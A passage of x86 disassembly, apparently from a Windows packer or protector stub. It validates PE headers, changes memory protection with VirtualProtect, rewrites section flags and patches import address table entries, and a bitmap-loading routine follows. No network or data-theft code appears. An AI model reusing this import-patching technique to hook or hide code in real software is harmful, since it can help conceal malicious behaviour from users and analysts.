arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
mov eax, ds:dword_4E6914
add eax, 1
mov ds:dword_4E6914, eax
mov ecx, [ebp+arg_14]
push ecx
mov dl, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_4D9AB0
add esp, 18h
mov [ebp+var_4], al
mov ecx, ds:dword_4E6914
sub ecx, 1
mov ds:dword_4E6914, ecx
mov al, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4D9D70 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4D9DC0 proc near ; CODE XREF: _4:004D32A6�p
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 3Ch
mov [ebp+var_18], 0
call sub_4D7DD0
call sub_4DEDD4
call sub_4D13F3
mov eax, ds:dword_4E6684
mov ecx, [eax+4]
mov [ebp+var_18], ecx
mov edx, [ebp+var_18]
mov eax, [ebp+var_18]
add eax, [edx+3Ch]
mov ds:dword_4E6910, eax
mov ecx, ds:dword_4E6910
cmp dword ptr [ecx], 4550h
jz short loc_4D9E0D
mov ecx, 0EF000002h
call sub_4DD342
loc_4D9E0D: ; CODE XREF: sub_4D9DC0+41�j
mov edx, ds:dword_4E6698
sub edx, 3
mov [ebp+var_4], edx
cmp ds:dword_4E6680, 1
jz short loc_4D9E37
lea eax, [ebp+var_8]
push eax
push 4
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4E67AC ;; VirtualProtect
loc_4D9E37: ; CODE XREF: sub_4D9DC0+60�j
mov [ebp+var_14], 0
jmp short loc_4D9E49
; ---------------------------------------------------------------------------
loc_4D9E40: ; CODE XREF: sub_4D9DC0+AF�j
; sub_4D9DC0:loc_4D9F6D�j
mov edx, [ebp+var_14]
add edx, 1
mov [ebp+var_14], edx
loc_4D9E49: ; CODE XREF: sub_4D9DC0+7E�j
mov eax, [ebp+var_14]
cmp eax, [ebp+var_4]
jnb loc_4D9F72
mov ecx, [ebp+var_14]
imul ecx, 28h
mov edx, ds:off_4E669C
add edx, ecx
mov [ebp+var_20], edx
mov eax, [ebp+var_20]
cmp dword ptr [eax+0Ch], 0
jnz short loc_4D9E71
jmp short loc_4D9E40
; ---------------------------------------------------------------------------
loc_4D9E71: ; CODE XREF: sub_4D9DC0+AD�j
cmp [ebp+var_14], 20h
jnb short loc_4D9E98
mov edx, 1
mov ecx, [ebp+var_14]
shl edx, cl
mov eax, ds:dword_4E6684
mov ecx, [eax+10h]
and ecx, edx
test ecx, ecx
jz short loc_4D9E98
mov [ebp+var_34], 1
jmp short loc_4D9E9F
; ---------------------------------------------------------------------------
loc_4D9E98: ; CODE XREF: sub_4D9DC0+B5�j
; sub_4D9DC0+CD�j
mov [ebp+var_34], 0
loc_4D9E9F: ; CODE XREF: sub_4D9DC0+D6�j
mov edx, [ebp+var_34]
mov [ebp+var_28], edx
cmp [ebp+var_14], 20h
jnb short loc_4D9ECD
mov eax, 1
mov ecx, [ebp+var_14]
shl eax, cl
mov ecx, ds:dword_4E6684
mov edx, [ecx+14h]
and edx, eax
test edx, edx
jz short loc_4D9ECD
mov [ebp+var_38], 1
jmp short loc_4D9ED4
; ---------------------------------------------------------------------------
loc_4D9ECD: ; CODE XREF: sub_4D9DC0+E9�j
; sub_4D9DC0+102�j
mov [ebp+var_38], 0
loc_4D9ED4: ; CODE XREF: sub_4D9DC0+10B�j
mov eax, [ebp+var_38]
mov [ebp+var_2C], eax
mov ecx, [ebp+var_18]
push ecx
mov edx, [ebp+var_20]
push edx
mov eax, [ebp+var_2C]
push eax
mov ecx, [ebp+var_28]
push ecx
call loc_4D98C0
mov edx, [ebp+var_20]
mov eax, [edx+24h]
and eax, 20000000h
test eax, eax
jz short loc_4D9F19
mov ecx, [ebp+var_20]
mov edx, [ecx+24h]
and edx, 80000000h
neg edx
sbb edx, edx
and edx, 20h
add edx, 20h
mov [ebp+var_3C], edx
jmp short loc_4D9F32
; ---------------------------------------------------------------------------
loc_4D9F19: ; CODE XREF: sub_4D9DC0+13C�j
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
and ecx, 80000000h
neg ecx
sbb ecx, ecx
and ecx, 2
add ecx, 2
mov [ebp+var_3C], ecx
loc_4D9F32: ; CODE XREF: sub_4D9DC0+157�j
mov edx, [ebp+var_3C]
mov [ebp+var_24], edx
cmp ds:dword_4E6680, 1
jz short loc_4D9F6D
mov eax, ds:dword_4E6910
xor ecx, ecx
mov cx, [eax+14h]
mov edx, ds:dword_4E6910
lea eax, [edx+ecx+18h]
mov ecx, [ebp+var_14]
imul ecx, 28h
add eax, ecx
mov [ebp+var_30], eax
mov edx, [ebp+var_30]
mov eax, [ebp+var_20]
mov ecx, [eax+24h]
mov [edx+24h], ecx
loc_4D9F6D: ; CODE XREF: sub_4D9DC0+17F�j
jmp loc_4D9E40
; ---------------------------------------------------------------------------
loc_4D9F72: ; CODE XREF: sub_4D9DC0+8F�j
cmp ds:dword_4E6680, 1
jz short loc_4D9FA3
mov edx, ds:dword_4E6910
mov eax, ds:off_4E669C
mov ecx, [eax-0Ch]
mov [edx+0ECh], ecx
mov edx, ds:dword_4E6910
mov eax, ds:off_4E669C
mov ecx, [eax-8]
mov [edx+0E8h], ecx
loc_4D9FA3: ; CODE XREF: sub_4D9DC0+1B9�j
cmp ds:dword_4E6680, 1
jz short loc_4D9FC3
lea edx, [ebp+var_8]
push edx
mov eax, [ebp+var_8]
push eax
push 190h
mov ecx, [ebp+var_18]
push ecx
call ds:dword_4E67AC ;; VirtualProtect
loc_4D9FC3: ; CODE XREF: sub_4D9DC0+1EA�j
mov edx, ds:dword_4E6684
mov eax, [ebp+var_18]
add eax, [edx+8]
mov [ebp+var_C], eax
mov ds:dword_4E6914, 0
push 0
push 0
push offset aExecutable ; "EXECUTABLE"
mov ecx, ds:dword_4E6910
push ecx
mov edx, [ebp+var_18]
push edx
mov eax, [ebp+var_C]
push eax
call sub_4D9AB0
add esp, 18h
call sub_4DB13C
and eax, 0FFh
test eax, eax
jz short loc_4DA01F
loc_4DA00A: ; CODE XREF: sub_4D9DC0+258�j
call sub_4DB14D
and eax, 0FFh
test eax, eax
jz short loc_4DA01A
jmp short loc_4DA00A
; ---------------------------------------------------------------------------
loc_4DA01A: ; CODE XREF: sub_4D9DC0+256�j
call sub_4DB13C
loc_4DA01F: ; CODE XREF: sub_4D9DC0+248�j
push offset aImm32_dll ; "imm32.dll"
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_4DA041
push offset aImm32_dll ; "imm32.dll"
mov ecx, [ebp+var_1C]
push ecx
call sub_4DA070
loc_4DA041: ; CODE XREF: sub_4D9DC0+271�j
push offset aOleoaut32_dll ; "oleoaut32.dll"
call ds:dword_4E6718 ;; GetModuleHandleA
mov [ebp+var_10], eax
cmp [ebp+var_10], 0
jz short loc_4DA063
push offset aOleaout32_dll ; "oleaout32.dll"
mov edx, [ebp+var_10]
push edx
call sub_4DA070
loc_4DA063: ; CODE XREF: sub_4D9DC0+293�j
mov esp, ebp
pop ebp
retn
sub_4D9DC0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA070 proc near ; CODE XREF: sub_4D9DC0+27C�p
; sub_4D9DC0+29E�p ...
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 2Ch
mov eax, ds:dword_4E6914
add eax, 1
mov ds:dword_4E6914, eax
mov ecx, [ebp+arg_4]
mov ds:off_4E5BE8, ecx
push 9
lea ecx, [ebp+var_28]
call sub_4E077C
lea edx, [ebp+var_28]
push edx
push 0
mov eax, [ebp+arg_0]
push eax
call sub_4DA0D0
add esp, 0Ch
mov ecx, ds:dword_4E6914
sub ecx, 1
mov ds:dword_4E6914, ecx
mov [ebp+var_2C], 1
lea ecx, [ebp+var_28]
call sub_4E082A
mov eax, [ebp+var_2C]
mov esp, ebp
pop ebp
retn 8
sub_4DA070 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA0D0 proc near ; CODE XREF: sub_4DA070+30�p
; sub_4DA0D0+24B�p
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3460
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFB8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp [ebp+arg_0], 0
jnz short loc_4DA101
jmp loc_4DA3BC
; ---------------------------------------------------------------------------
loc_4DA101: ; CODE XREF: sub_4DA0D0+2A�j
mov eax, [ebp+arg_0]
mov [ebp+var_2C], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_28], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_30], edx
jmp short loc_4DA11E
; ---------------------------------------------------------------------------
loc_4DA115: ; CODE XREF: sub_4DA0D0:loc_4DA133�j
mov eax, [ebp+var_30]
mov ecx, [eax+4]
mov [ebp+var_30], ecx
loc_4DA11E: ; CODE XREF: sub_4DA0D0+43�j
cmp [ebp+var_30], 0
jz short loc_4DA135
mov edx, [ebp+var_30]
mov eax, [edx]
cmp eax, [ebp+arg_0]
jnz short loc_4DA133
jmp loc_4DA3BC
; ---------------------------------------------------------------------------
loc_4DA133: ; CODE XREF: sub_4DA0D0+5C�j
jmp short loc_4DA115
; ---------------------------------------------------------------------------
loc_4DA135: ; CODE XREF: sub_4DA0D0+52�j
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_4E0871
test eax, eax
jz short loc_4DA14A
jmp loc_4DA3BC
; ---------------------------------------------------------------------------
loc_4DA14A: ; CODE XREF: sub_4DA0D0+73�j
mov edx, ds:dword_4E6914
add edx, 1
mov ds:dword_4E6914, edx
mov eax, [ebp+arg_0]
mov [ebp+var_34], eax
mov ecx, ds:off_4E5BE8
mov [ebp+var_24], ecx
mov [ebp+var_4], 0
mov edx, [ebp+var_34]
mov eax, [ebp+var_34]
add eax, [edx+3Ch]
mov [ebp+var_38], eax
mov ecx, [ebp+var_38]
cmp dword ptr [ecx], 4550h
jnz loc_4DA371
cmp ds:dword_4E6680, 1
jnz short loc_4DA1AA
cmp [ebp+arg_0], 80000000h
jbe short loc_4DA1AA
push 0
push 0
push 0
push 0
call ds:dword_4E6778 ;; RaiseException
loc_4DA1AA: ; CODE XREF: sub_4DA0D0+C1�j
; sub_4DA0D0+CA�j
mov edx, [ebp+var_38]
mov eax, [ebp+var_34]
add eax, [edx+80h]
mov [ebp+var_20], eax
mov [ebp+var_4], 1
cmp ds:dword_4E6680, 1
jnz short loc_4DA247
mov [ebp+var_40], 0
jmp short loc_4DA1DB
; ---------------------------------------------------------------------------
loc_4DA1D2: ; CODE XREF: sub_4DA0D0:loc_4DA245�j
mov ecx, [ebp+var_40]
add ecx, 1
mov [ebp+var_40], ecx
loc_4DA1DB: ; CODE XREF: sub_4DA0D0+100�j
mov edx, [ebp+var_38]
xor eax, eax
mov ax, [edx+6]
cmp [ebp+var_40], eax
jnb short loc_4DA247
mov ecx, [ebp+var_38]
xor edx, edx
mov dx, [ecx+14h]
mov eax, [ebp+var_38]
lea ecx, [eax+edx+18h]
mov edx, [ebp+var_40]
imul edx, 28h
add ecx, edx
mov [ebp+var_44], ecx
mov eax, [ebp+var_44]
mov ecx, [ebp+var_34]
add ecx, [eax+0Ch]
cmp ecx, [ebp+var_20]
ja short loc_4DA245
mov edx, [ebp+var_44]
mov eax, [ebp+var_34]
add eax, [edx+0Ch]
mov ecx, [ebp+var_44]
add eax, [ecx+8]
cmp [ebp+var_20], eax
ja short loc_4DA245
mov edx, [ebp+var_44]
mov eax, [edx+24h]
and eax, 10000000h
test eax, eax
jz short loc_4DA243
push 0
push 0
push 0
push 0
call ds:dword_4E6778 ;; RaiseException
loc_4DA243: ; CODE XREF: sub_4DA0D0+163�j
jmp short loc_4DA247
; ---------------------------------------------------------------------------
loc_4DA245: ; CODE XREF: sub_4DA0D0+140�j
; sub_4DA0D0+154�j
jmp short loc_4DA1D2
; ---------------------------------------------------------------------------
loc_4DA247: ; CODE XREF: sub_4DA0D0+F7�j
; sub_4DA0D0+117�j ...
mov [ebp+var_4], 0
jmp short loc_4DA26E
; ---------------------------------------------------------------------------
loc_4DA250: ; DATA XREF: _5:004E3470�o
mov ecx, [ebp+var_14]
mov edx, [ecx]
mov eax, [edx]
mov [ebp+var_58], eax
mov eax, [ebp+var_58]
neg eax
sbb eax, eax
neg eax
retn
; ---------------------------------------------------------------------------
loc_4DA264: ; DATA XREF: _5:004E3474�o
mov esp, [ebp+var_18]
mov [ebp+var_4], 0
loc_4DA26E: ; CODE XREF: sub_4DA0D0+17E�j
mov ecx, [ebp+var_38]
mov eax, [ecx+84h]
xor edx, edx
mov ecx, 14h
div ecx
mov [ebp+var_1C], eax
mov [ebp+var_3C], 0
jmp short loc_4DA295
; ---------------------------------------------------------------------------
loc_4DA28C: ; CODE XREF: sub_4DA0D0:loc_4DA36C�j
mov edx, [ebp+var_3C]
add edx, 1
mov [ebp+var_3C], edx
loc_4DA295: ; CODE XREF: sub_4DA0D0+1BA�j
mov eax, [ebp+var_3C]
cmp eax, [ebp+var_1C]
jnb loc_4DA371
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
mov eax, [ebp+var_34]
add eax, [edx+ecx+0Ch]
mov [ebp+var_50], eax
mov ecx, [ebp+var_3C]
imul ecx, 14h
mov edx, [ebp+var_20]
cmp dword ptr [edx+ecx+0Ch], 0
jz short loc_4DA2DD
mov eax, [ebp+var_3C]
imul eax, 14h
mov ecx, [ebp+var_20]
mov edx, [ecx+eax+0Ch]
mov eax, [ebp+var_34]
xor ecx, ecx
mov cl, [eax+edx]
test ecx, ecx
jnz short loc_4DA2E2
loc_4DA2DD: ; CODE XREF: sub_4DA0D0+1F2�j
jmp loc_4DA371
; ---------------------------------------------------------------------------
loc_4DA2E2: ; CODE XREF: sub_4DA0D0+20B�j
mov edx, [ebp+var_3C]
imul edx, 14h
mov eax, [ebp+var_20]
mov ecx, [ebp+var_34]
add ecx, [eax+edx+10h]
mov [ebp+var_48], ecx
mov edx, [ebp+var_50]
push edx
call sub_4DFF8C
mov [ebp+var_4C], eax
mov eax, [ebp+var_50]
mov ds:off_4E5BE8, eax
cmp [ebp+var_4C], 0
jz short loc_4DA323
mov ecx, [ebp+arg_8]
push ecx
lea edx, [ebp+var_2C]
push edx
mov eax, [ebp+var_4C]
push eax
call sub_4DA0D0
add esp, 0Ch
loc_4DA323: ; CODE XREF: sub_4DA0D0+23D�j
push 0
call ds:dword_4E6718 ;; GetModuleHandleA
cmp eax, [ebp+arg_0]
jz short loc_4DA36C
mov ecx, [ebp+var_4C]
push ecx
mov ecx, ds:dword_4EB0D8
call sub_4E0871
test eax, eax
jz short loc_4DA36C
jmp short loc_4DA34E
; ---------------------------------------------------------------------------
loc_4DA345: ; CODE XREF: sub_4DA0D0+29A�j
mov edx, [ebp+var_48]
add edx, 4
mov [ebp+var_48], edx
loc_4DA34E: ; CODE XREF: sub_4DA0D0+273�j
mov eax, [ebp+var_48]
cmp dword ptr [eax], 0
jz short loc_4DA36C
mov ecx, [ebp+var_50]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_48]
push eax
call sub_4DA3D0
add esp, 0Ch
jmp short loc_4DA345
; ---------------------------------------------------------------------------
loc_4DA36C: ; CODE XREF: sub_4DA0D0+25E�j
; sub_4DA0D0+271�j ...
jmp loc_4DA28C
; ---------------------------------------------------------------------------
loc_4DA371: ; CODE XREF: sub_4DA0D0+B4�j
; sub_4DA0D0+1CB�j ...
push 1
mov ecx, [ebp+arg_0]
push ecx
mov ecx, [ebp+arg_8]
call sub_4E098E
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_4DA3A5
; ---------------------------------------------------------------------------
mov edx, [ebp+var_14]
mov eax, [edx]
mov ecx, [eax]
mov [ebp+var_54], ecx
mov eax, [ebp+var_54]
neg eax
sbb eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_4], 0FFFFFFFFh
loc_4DA3A5: ; CODE XREF: sub_4DA0D0+2B6�j
mov eax, [ebp+var_24]
mov ds:off_4E5BE8, eax
mov ecx, ds:dword_4E6914
sub ecx, 1
mov ds:dword_4E6914, ecx
loc_4DA3BC: ; CODE XREF: sub_4DA0D0+2C�j
; sub_4DA0D0+5E�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4DA0D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA3D0 proc near ; CODE XREF: sub_4D9AB0+282�p
; sub_4DA0D0+292�p
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
mov [ebp+var_4], 0
cmp ds:dword_4EB0D4, 0
jnz short loc_4DA3F0
mov ecx, 0EF00000Ah
call sub_4DD342
loc_4DA3F0: ; CODE XREF: sub_4DA3D0+14�j
mov eax, [ebp+arg_0]
mov ecx, [eax]
push ecx
mov ecx, ds:dword_4EB0D4
call sub_4E0871
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jz short loc_4DA44F
lea edx, [ebp+var_10]
push edx
push 4
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_4E67AC ;; VirtualProtect
test eax, eax
jnz short loc_4DA42A
mov ecx, 0EF00000Bh
call sub_4DD342
loc_4DA42A: ; CODE XREF: sub_4DA3D0+4E�j
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ecx], eax
lea ecx, [ebp+var_C]
push ecx
mov edx, [ebp+var_10]
push edx
push 4
mov eax, [ebp+arg_0]
push eax
call ds:dword_4E67AC ;; VirtualProtect
mov [ebp+var_4], 1
loc_4DA44F: ; CODE XREF: sub_4DA3D0+38�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_4DA3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA456 proc near ; CODE XREF: sub_4D13F3+23�p
; sub_4D4036+A5�p
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_1E = dword ptr -1Eh
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_4E3478
push offset sub_4D154C
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
sub esp, 6Ch
push ebx
push esi
push edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_4], 0
and [ebp+var_3C], 0
lea eax, [ebp+var_34]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
push 0Eh
lea eax, [ebp+var_28]
push eax
push [ebp+arg_0]
call sub_4D6177
test eax, eax
jz short loc_4DA4B7
lea eax, [ebp+var_44]
push eax
push [ebp+arg_0]
call sub_4D5672
test eax, eax
jnz short loc_4DA4D0
loc_4DA4B7: ; CODE XREF: sub_4DA456+4F�j
push 0FFFFFFFFh
and [ebp+var_64], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_64]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA4D0: ; CODE XREF: sub_4DA456+5F�j
movzx eax, [ebp+var_28]
cmp eax, 4D42h
jnz short loc_4DA534
mov eax, [ebp+var_26]
cmp eax, [ebp+var_44]
ja short loc_4DA534
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
call sub_4DD35A
pop ecx
mov [ebp+var_5C], eax
mov eax, [ebp+var_5C]
mov [ebp+var_30], eax
lea eax, [ebp+var_48]
push eax
push 0
lea eax, [ebp+var_3C]
push eax
mov eax, [ebp+var_26]
sub eax, 0Eh
push eax
push [ebp+var_30]
push [ebp+arg_0]
call sub_4D6177
test eax, eax
jnz short loc_4DA532
push 0FFFFFFFFh
and [ebp+var_68], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_68]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA532: ; CODE XREF: sub_4DA456+C1�j
jmp short loc_4DA54D
; ---------------------------------------------------------------------------
loc_4DA534: ; CODE XREF: sub_4DA456+83�j
; sub_4DA456+8B�j
push 0FFFFFFFFh
and [ebp+var_6C], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_6C]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA54D: ; CODE XREF: sub_4DA456:loc_4DA532�j
mov eax, [ebp+var_30]
mov eax, [eax]
mov [ebp+var_38], eax
mov eax, [ebp+var_30]
cmp dword ptr [eax+10h], 0
jz short loc_4DA577
push 0FFFFFFFFh
and [ebp+var_70], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_70]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA577: ; CODE XREF: sub_4DA456+106�j
push 0
call ds:dword_4E67E0 ;; CreateCompatibleDC
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 0
jnz short loc_4DA5A1
push 0FFFFFFFFh
and [ebp+var_74], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_74]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA5A1: ; CODE XREF: sub_4DA456+130�j
mov eax, [ebp+var_1E]
mov ecx, [ebp+var_30]
lea eax, [ecx+eax-0Eh]
mov [ebp+var_40], eax
and [ebp+var_4C], 0
and [ebp+var_54], 0
mov eax, [ebp+var_30]
movzx eax, word ptr [eax+0Eh]
mov [ebp+var_78], eax
cmp [ebp+var_78], 8
jz short loc_4DA5F5
cmp [ebp+var_78], 10h
jz short loc_4DA5EC
cmp [ebp+var_78], 18h
jz short loc_4DA5E3
cmp [ebp+var_78], 20h
jz short loc_4DA5DA
jmp short loc_4DA5FE
; ---------------------------------------------------------------------------
loc_4DA5DA: ; CODE XREF: sub_4DA456+180�j
mov [ebp+var_4C], 4
jmp short loc_4DA617
; ---------------------------------------------------------------------------
loc_4DA5E3: ; CODE XREF: sub_4DA456+17A�j
mov [ebp+var_4C], 3
jmp short loc_4DA617
; ---------------------------------------------------------------------------
loc_4DA5EC: ; CODE XREF: sub_4DA456+174�j
mov [ebp+var_4C], 2
jmp short loc_4DA617
; ---------------------------------------------------------------------------
loc_4DA5F5: ; CODE XREF: sub_4DA456+16E�j
mov [ebp+var_4C], 1
jmp short loc_4DA617
; ---------------------------------------------------------------------------
loc_4DA5FE: ; CODE XREF: sub_4DA456+182�j
push 0FFFFFFFFh
and [ebp+var_7C], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_7C]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA617: ; CODE XREF: sub_4DA456+18B�j
; sub_4DA456+194�j ...
push 0
push 0
lea eax, [ebp+var_58]
push eax
push 0
push [ebp+var_30]
push [ebp+var_2C]
call ds:dword_4E67E4 ;; CreateDIBSection
mov [ebp+var_54], eax
cmp [ebp+var_54], 0
jnz short loc_4DA64F
push 0FFFFFFFFh
and [ebp+var_80], 0
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_80]
jmp loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA64F: ; CODE XREF: sub_4DA456+1DE�j
mov eax, [ebp+var_30]
mov eax, [eax+4]
imul eax, [ebp+var_4C]
mov [ebp+var_50], eax
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
test edx, edx
jz short loc_4DA67F
mov eax, [ebp+var_50]
cdq
push 4
pop ecx
idiv ecx
push 4
pop eax
sub eax, edx
mov ecx, [ebp+var_50]
add ecx, eax
mov [ebp+var_50], ecx
loc_4DA67F: ; CODE XREF: sub_4DA456+211�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_50]
imul ecx, [eax+8]
mov esi, [ebp+var_40]
mov edi, [ebp+var_58]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0FFFFFFFFh
mov eax, [ebp+var_54]
mov [ebp+var_84], eax
lea eax, [ebp+var_10]
push eax
call sub_4D1496
pop ecx
pop ecx
mov eax, [ebp+var_84]
jmp short loc_4DA6DC
; ---------------------------------------------------------------------------
loc_4DA6BB: ; DATA XREF: _5:004E3480�o
cmp [ebp+var_2C], 0
jz short loc_4DA6CA
push [ebp+var_2C]
call ds:dword_4E67E8 ;; DeleteDC
loc_4DA6CA: ; CODE XREF: sub_4DA456+269�j
mov eax, [ebp+var_30]
mov [ebp+var_60], eax
push [ebp+var_60]
call sub_4DD3DD
pop ecx
retn
; ---------------------------------------------------------------------------
xor eax, eax
loc_4DA6DC: ; CODE XREF: sub_4DA456+75�j
; sub_4DA456+D7�j ...
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_4DA456 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA6EB proc near ; CODE XREF: sub_4DB1E1+969�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push 0
push [ebp+arg_0]
call sub_4DE2CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_4DA70F
; ---------------------------------------------------------------------------
loc_4DA708: ; CODE XREF: sub_4DA6EB+40�j
mov eax, [ebp+var_8]
inc eax
mov [ebp+var_8], eax
loc_4DA70F: ; CODE XREF: sub_4DA6EB+1B�j
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
test eax, eax
jz short loc_4DA72D
mov eax, [ebp+var_8]
movsx eax, byte ptr [eax]
push eax
call sub_4D186E
pop ecx
mov ecx, [ebp+var_8]
mov [ecx], al
jmp short loc_4DA708
; ---------------------------------------------------------------------------
loc_4DA72D: ; CODE XREF: sub_4DA6EB+2C�j
push 0Ch
call sub_4DD35A
pop ecx
mov [ebp+var_10], eax
mov eax, [ebp+var_10]
mov [ebp+var_C], eax
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_4]
mov [eax+4], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+var_4]
mov [eax], ecx
mov eax, [ebp+var_C]
mov ecx, [ebp+arg_8]
mov [eax+8], ecx
mov eax, [ebp+var_C]
leave
retn
sub_4DA6EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4DA75D proc near ; CODE XREF: sub_4D9AB0+9F�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_16 = byte ptr -16h
var_15 = byte ptr -15h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push 0
push [ebp+arg_4]
call sub_4DE2CA
pop ecx
pop ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov [ebp+var_8], eax
jmp short loc_4DA781
; ---------------------------------------------------------------------------
